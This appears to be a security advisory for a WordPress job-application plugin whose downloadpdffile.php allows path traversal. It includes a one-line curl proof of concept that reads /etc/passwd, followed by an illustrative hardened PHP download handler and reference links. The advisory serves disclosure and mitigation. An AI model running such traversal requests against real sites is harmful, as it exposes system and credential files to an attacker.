EPSS score: 0.053 (Low), percentile: 93.1%
The plugin is still affected and has been closed. The code in downloadpdffile.php performs no sanity checks on the fileName parameter, so a remote attacker can download sensitive system files (such as /etc/passwd) through path traversal.
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
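As an added illustration of the mitigation (this is example code, not the plugin's own downloadpdffile.php), the handler below serves a PDF only when the requested name is a plain file name, resolves to a path inside a fixed uploads directory, and survives a canonical-path check. The uploads directory location, the parameter name fileName and the restriction to .pdf files are assumptions made for the example.

```php
<?php
// Added example, not the plugin's code: a path-traversal-resistant PDF download
// handler. The vulnerable pattern described on the page is concatenating the
// user-supplied fileName straight into a path with no checks; the fix is to
// validate the name, resolve it against one base directory, and verify the
// canonical result still lives inside that directory.
declare(strict_types=1);

/**
 * Resolve a user-supplied file name against a fixed base directory.
 * Returns the absolute path of an existing regular file, or null if the
 * request must be refused.
 */
function resolve_pdf_path(string $baseDir, string $userFileName): ?string
{
    // Accept only a bare file name: letters, digits, '_' and '-', ending in
    // ".pdf". This rejects '/', '\', '..', NUL bytes and URL-encoded tricks
    // before any filesystem call is made.
    if (!preg_match('/\A[A-Za-z0-9_\-]+\.pdf\z/', $userFileName)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing or unreadable
    }

    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userFileName);
    if ($candidate === false) {
        return null; // no such file
    }

    // Defence in depth: the canonical path must start with "<base>/". This
    // also catches symlinks inside the uploads directory that point elsewhere.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    if (!is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Assumption for the example: uploaded PDFs live in ./uploads beside this script.
$uploadsDir = __DIR__ . DIRECTORY_SEPARATOR . 'uploads';

// $_GET values may be arrays; only accept a string.
$requested = $_GET['fileName'] ?? null;
$path = is_string($requested) ? resolve_pdf_path($uploadsDir, $requested) : null;

if ($path === null) {
    // Same response for "invalid name" and "not found": no path disclosure.
    http_response_code(404);
    header('Content-Type: text/plain; charset=utf-8');
    echo "Not found\n";
    exit;
}

header('Content-Type: application/pdf');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

With this handler a request such as the one shown above, whose fileName contains "../" segments, fails the regular expression and is answered with a plain 404 before any file is opened. In a WordPress plugin the same endpoint should additionally be gated by an authorization check (for example, WordPress's current_user_can()) so that only users entitled to a given application's PDF can fetch it, since a valid file name alone should not grant access.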
References:
packetstormsecurity.com/files/132960/
vapid.dhs.org/advisory.php?v=142
vulners.com/exploitdb/EDB-ID:37754